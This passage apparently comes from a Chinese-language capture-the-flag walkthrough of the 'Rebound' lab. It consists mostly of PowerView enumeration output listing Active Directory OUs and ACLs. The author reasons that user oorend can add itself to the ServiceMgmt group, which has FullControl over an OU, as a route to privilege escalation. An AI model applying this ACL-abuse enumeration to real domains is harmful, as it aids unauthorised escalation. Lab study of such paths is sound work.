SecurityIdentifier : REBOUND\oorend

ldap_monitor 没有 ACL 权限,而 oorend 对 ServiceMgmt 有 Self 的权限。权限登记是ACCESS_ALLOWED_ACE用于明确表示”允许某个用户或用户组对某个资源执行特定操作”的规则(允许访问控制项。)

比如能将自己加入 ServiceMgmt 组内。

查看更多的信息,比如组织单元(组织单元简称 OU 是 Active Directory(AD)中的一种容器对象,用于逻辑分组和管理用户、计算机、组策略和其他 AD 对象。)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainOU
objectClass : top
organizationalUnit
ou : Service Users
distinguishedName : OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 12:58:02 (today)
uSNCreated : 69325
uSNChanged : 185281
name : Service Users
objectGUID : {fc826af9-06f9-47e7-866e-4c3c015638b8}
objectCategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601

objectClass : top
organizationalUnit
ou : Domain Controllers
distinguishedName : OU=Domain Controllers,DC=rebound,DC=htb
instanceType : 4
whenCreated : 07/04/2023 14:01:41 (1 year, 11 months ago)
whenChanged : 07/04/2023 14:01:41 (1 year, 11 months ago)
uSNCreated : 5804
uSNChanged : 5804
name : Domain Controllers
objectGUID : {80923a93-fed7-4fe0-b3c7-980864dc3f78}
objectCategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
gPLink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=rebound,DC=htb;0]
dSCorePropagationData : 04/08/2023
04/07/2023
01/01/1601

只有这两个。那我们可以猜想把刚才的 oorend 写入 ServiceMgmt 是不是就能得到权限提升。我们可以通过域控制器的 ACL 确认一下这里。首先指定域控制器的 OU 查看它的 ACL。(PowerView 的命令核心大多都是 Get-Domain 这系列,可以从这个开始补全)然而这些基本和我们目前有的两个用户无关。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
Get-DomainObjectAcl -Identity "OU=Domain Controllers,DC=rebound,DC=htb"
ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Authenticated Users

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : ReadAndExecute
AccessMask : ReadAndExecute
InheritanceType : None
SecurityIdentifier : REBOUND\Domain Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : Local System

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Key Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Key Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Creator Owner

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Computer
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Group
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : User
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : Group
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Private-Information
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ListChildObjects
AccessMask : ListChildObjects
InheritanceType : None
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ReadAndExecute
AccessMask : ReadAndExecute
InheritanceType : None
SecurityIdentifier : Administrators

再看一下另一个 OU

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -Identity "OU=Service Users,DC=rebound,DC=htb"
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : inetOrgPerson
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Computer
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Group
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Print-Queue
InheritanceType : None
SecurityIdentifier : Print Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : User
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\Domain Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\ServiceMgmt

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Authenticated Users

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : Local System

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Key Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Key Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Creator Owner

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Computer
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Group
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : User
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
